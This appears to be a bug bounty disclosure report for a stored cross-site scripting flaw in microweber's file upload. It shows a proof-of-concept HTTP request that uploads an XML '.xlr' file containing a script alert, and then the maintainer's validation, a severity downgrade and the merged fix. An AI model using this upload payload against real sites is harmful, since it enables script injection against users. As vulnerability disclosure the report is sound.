Cross-site scripting - Stored via upload ".xlr" file in microweber/microweber


Reported on

Jul 2nd 2022


In file upload function, the server allow upload .xlr file with contain some javascript code lead to XSS.

Proof of Concept


POST /demo/plupload HTTP/1.1
Cookie: laravel_session=r768Tqzv8h0fkjgvKdofhxgmjcorT6pwuqMKJkIb; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; back_to_admin=https%3A//; csrf-token-data=%7B%22value%22%3A%22YbSQ8rVR4gKnhlneQm7raooqI7YrB7VZJGH6lLJX%22%2C%22expiry%22%3A1656778667013%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------80883503232369887683205133266
Content-Length: 959
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: red
Te: trailers
Connection: close

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="chunk"

Content-Disposition: form-data; name="chunks"

Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
        <a:script xmlns:a="">alert(window.origin)</a:script>


HTTP/1.1 200 OK
Date: Sat, 02 Jul 2022 16:22:43 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 02 Jul 2022 16:22:44 GMT
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/json
Content-Length: 129


PoC Image



This vulnerability can be arbitrarily executed javascript code to perform HTTP request, CSRF, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
Nhien.IT modified the report
a month ago
Nhien.IT modified the report
a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov modified the Severity from Medium to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 39797c a month ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
Peter Ivanov
a month ago


Thanks for the report. In order to upload the .xlr file you need to be logged as admin

a month ago


Yah! Thank you, sir!

to join this conversation